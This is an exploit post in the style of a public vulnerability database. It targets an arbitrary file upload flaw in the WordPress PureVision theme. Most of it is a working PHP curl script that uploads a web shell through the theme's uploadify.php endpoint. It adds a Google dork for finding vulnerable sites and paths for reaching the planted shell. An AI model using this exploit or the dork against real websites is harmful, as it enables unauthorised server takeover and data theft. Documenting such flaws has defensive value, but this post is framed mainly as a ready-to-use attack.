Wordpress PureVision Theme Arbitrary File Upload Vulnerability

#Title : Wordpress PureVision Theme Arbitrary File Upload
#Author : r0seMary
#Date : 14/10/13 - 14 November 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://themeforest.net
#Download : http://themeforest.net/item/purevision-wordpress-theme/156538
#Greetz : Sanja07 | J3JU | GOBER | Panda404 | Agam Bastard | IDVisioNs | Mr_Cihuy | 0KaL
#Thanks : Damn Security
#Tested : Mozila, Chrome-> Windows
#Vulnerabillity : Arbitrary File Upload
#Dork : inurl:wp-content/themes/purevision
==================================================================

<?php
$uploadfile="shellname.php"; 
$ch = curl_init("http://site.com/wordpress_path/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Shell Access -> 
http://site.com/wordpress_path/wpcontent/themes/purevision/scripts/admin/uploadify/namashell.php
or 
http://site.com/wordpress_path/wp-content/uploads/[years]/[month]/ > find your shell